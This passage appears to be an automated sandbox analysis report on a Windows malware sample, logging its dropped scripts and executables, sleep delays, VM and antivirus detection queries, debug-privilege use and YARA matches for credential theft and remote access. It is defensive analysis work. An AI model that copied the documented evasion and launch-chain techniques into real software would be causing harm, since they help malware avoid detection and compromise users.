Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\brokermonitordhcp\portruntime.exe Memory allocated: DD0000 memory reserve | memory write watch Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Memory allocated: 1ACD0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Memory allocated: 16B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Memory allocated: 1B530000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Memory allocated: F40000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Memory allocated: 1AAF0000 memory reserve | memory write watch Jump to behavior
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Memory allocated: 2760000 memory reserve | memory write watch
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Memory allocated: 1A860000 memory reserve | memory write watch
Source: C:\brokermonitordhcp\portruntime.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 599891 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 599781 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 599672 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 599563 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 599454 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 599329 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 599204 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 599079 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 598954 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Window / User API: threadDelayed 876 Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Window / User API: threadDelayed 1257 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Window / User API: threadDelayed 367 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Window / User API: threadDelayed 1325 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Window / User API: threadDelayed 1289 Jump to behavior
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Window / User API: threadDelayed 549
Source: C:\brokermonitordhcp\portruntime.exe TID: 6436 Thread sleep count: 876 > 30 Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe TID: 6436 Thread sleep count: 1257 > 30 Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe TID: 1660 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 4532 Thread sleep count: 367 > 30 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 2032 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 6220 Thread sleep count: 1325 > 30 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 6220 Thread sleep count: 1289 > 30 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944 Thread sleep time: -8301034833169293s >= -30000s Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944 Thread sleep time: -599891s >= -30000s Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944 Thread sleep time: -599781s >= -30000s Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944 Thread sleep time: -599672s >= -30000s Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944 Thread sleep time: -599563s >= -30000s Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944 Thread sleep time: -599454s >= -30000s Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944 Thread sleep time: -599329s >= -30000s Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944 Thread sleep time: -599204s >= -30000s Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944 Thread sleep time: -599079s >= -30000s Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 3944 Thread sleep time: -598954s >= -30000s Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 2092 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe TID: 2860 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe TID: 7080 Thread sleep count: 549 > 30
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe TID: 1920 Thread sleep count: 262 > 30
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe TID: 6416 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\brokermonitordhcp\portruntime.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0087A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_0087A5F4
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0088B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_0088B8E0
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0089AAA8 FindFirstFileExA, 0_2_0089AAA8
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0088DD72 VirtualQuery,GetSystemInfo, 0_2_0088DD72
Source: C:\brokermonitordhcp\portruntime.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 599891 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 599781 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 599672 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 599563 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 599454 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 599329 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 599204 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 599079 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 598954 Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Thread delayed: delay time: 922337203685477
Source: C:\brokermonitordhcp\portruntime.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe File opened: C:\Users\user Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: QIKiV83Pkl.exe, 00000000.00000003.1335317121.00000000034B3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000002.00000003.1440152295.00000000035E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1608191159.000000001BCB7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@
Source: w32tm.exe, 00000021.00000002.1545110842.0000029B28F79000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: QIKiV83Pkl.exe, 00000000.00000003.1335317121.00000000034B3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\C
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe API call chain: ExitProcess graph end node
Source: C:\brokermonitordhcp\portruntime.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0089866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0089866F
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0089753D mov eax, dword ptr fs:[00000030h] 0_2_0089753D
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0089B710 GetProcessHeap, 0_2_0089B710
Source: C:\brokermonitordhcp\portruntime.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Process token adjusted: Debug Jump to behavior
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0088F063 SetUnhandledExceptionFilter, 0_2_0088F063
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0088F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0088F22B
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0089866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0089866F
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0088EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0088EF05
Source: C:\brokermonitordhcp\portruntime.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\brokermonitordhcp\NKrhHlHeQ28n8tUMpitEGWra.vbe" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\brokermonitordhcp\2sqRykCed6LZLP.bat" " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\brokermonitordhcp\portruntime.exe "C:\brokermonitordhcp\portruntime.exe" Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TpLSZl35nU.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe "C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe"
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0088ED5B cpuid 0_2_0088ED5B
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_0088A63C
Source: C:\brokermonitordhcp\portruntime.exe Queries volume information: C:\brokermonitordhcp\portruntime.exe VolumeInformation Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\brokermonitordhcp\portruntime.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Queries volume information: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe VolumeInformation Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Queries volume information: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe VolumeInformation Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe Queries volume information: C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe VolumeInformation
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0088D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle, 0_2_0088D5D4
Source: C:\Users\user\Desktop\QIKiV83Pkl.exe Code function: 0_2_0087ACF5 GetVersionExW, 0_2_0087ACF5
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: HuzhgkcqwYiFfxvhdfMUs.exe, 00000015.00000002.1608191159.000000001BCB7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000025.00000002.1628584265.0000000002861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1474905892.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1564725393.000000000356D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.1628584265.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1474905892.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1564725393.0000000003531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.1515032727.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1476467442.0000000012CDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: portruntime.exe PID: 3212, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: HuzhgkcqwYiFfxvhdfMUs.exe PID: 1964, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: HuzhgkcqwYiFfxvhdfMUs.exe PID: 1532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: HuzhgkcqwYiFfxvhdfMUs.exe PID: 6572, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 00000025.00000002.1628584265.0000000002861000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1474905892.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1564725393.000000000356D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.1628584265.000000000289C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1474905892.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1564725393.0000000003531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.1515032727.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1476467442.0000000012CDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: portruntime.exe PID: 3212, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: HuzhgkcqwYiFfxvhdfMUs.exe PID: 1964, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: HuzhgkcqwYiFfxvhdfMUs.exe PID: 1532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: HuzhgkcqwYiFfxvhdfMUs.exe PID: 6572, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs